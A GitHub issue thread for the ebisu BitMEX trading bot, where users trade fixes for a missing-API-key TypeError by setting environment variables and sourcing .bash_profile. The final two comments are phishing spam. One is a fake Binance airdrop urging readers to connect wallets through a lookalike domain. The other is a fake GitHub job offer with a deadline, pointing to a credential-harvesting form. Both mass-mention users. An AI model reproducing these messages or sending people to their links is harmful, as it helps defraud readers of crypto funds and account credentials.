### ISSUE TITLE
__get_auth     if len(api_key) > 0 and len(api_secret):

### ISSUE THREAD

**Issue by tuutuutuut** [noda-sin/ebisu#9]
I have added my (testnet) APIKEY+ SECRET in .bash_profile
like so: 

export BITMEX_APIKEY=xxxxxxxxxx
export BITMEX_SECRET=xxxxxxxxxxxxxxx

when i run python3 main.py --demo --strategy Doten →

2019-05-06 02:51:27,683 - INFO - Bot Mode : Trade
Traceback (most recent call last):
  File "main.py", line 22, in <module>
    bot.run()
  File "/Users/admin/marketmakers/bitmex/ebisu/src/bot.py", line 123, in run
    self.exchange.on_update(self.bin_size, self.strategy)
  File "/Users/admin/marketmakers/bitmex/ebisu/src/bitmex.py", line 616, in on_update
    self.ws = BitMexWs(test=self.demo)
  File "/Users/admin/marketmakers/bitmex/ebisu/src/bitmex_websocket.py", line 59, in __init__
    header=self.__get_auth())
  File "/Users/admin/marketmakers/bitmex/ebisu/src/bitmex_websocket.py", line 71, in __get_auth
    if len(api_key) > 0 and len(api_secret):
TypeError: object of type 'NoneType' has no len()

any tips/suggestions?

**Comment by nateflanders** [comment]
I get the same error.

**Comment by canihojr** [comment]
me too

**Comment by l8nit3tr0ubl3** [comment]
set "BITMEX_TEST_API" rather then "BITMEX_API", and same for secret. Then run "source ~/.bash_profile" to actually use new variables

**Comment by caressgents** [comment]
@l8nit3tr0ubl3 would we do the same process to run on main net and not test net just reverse?

**Comment by l8nit3tr0ubl3** [comment]
what ive done is set both BITMEX_API, and BITMEX_TEST_API in the bash_profile file. Then be sure to run "source ~/.bash_profile" to set the new variables. This should bypass the "len > 0" issue for either testnet or mainnet.

however I have run into more issue after (likely user error)

**Comment by haikalfouzi** [comment]
fixed the error by running `source ~/.bash_profile` before running the main.py.

**Comment by njangra144** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @qiuanzhuijing, @ddhjy, @lcsouzamenezes, @Bittium1, @parinz1234, @freespiriter, @i5ting

**Comment by aiandev** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
eryk, @uwDavid, @cblh, @Pvakil, @GitHubEmploy, @utkutugrul, @zachhhhh, @ilhanu, @martinpavan, @chinyan, @stefanfluit, @Barralex, @jensdc92, @NightingaleV, @DeivyPereira, @bluebell136, @Pedroti12, @kfivap, @thehapax, @derorin
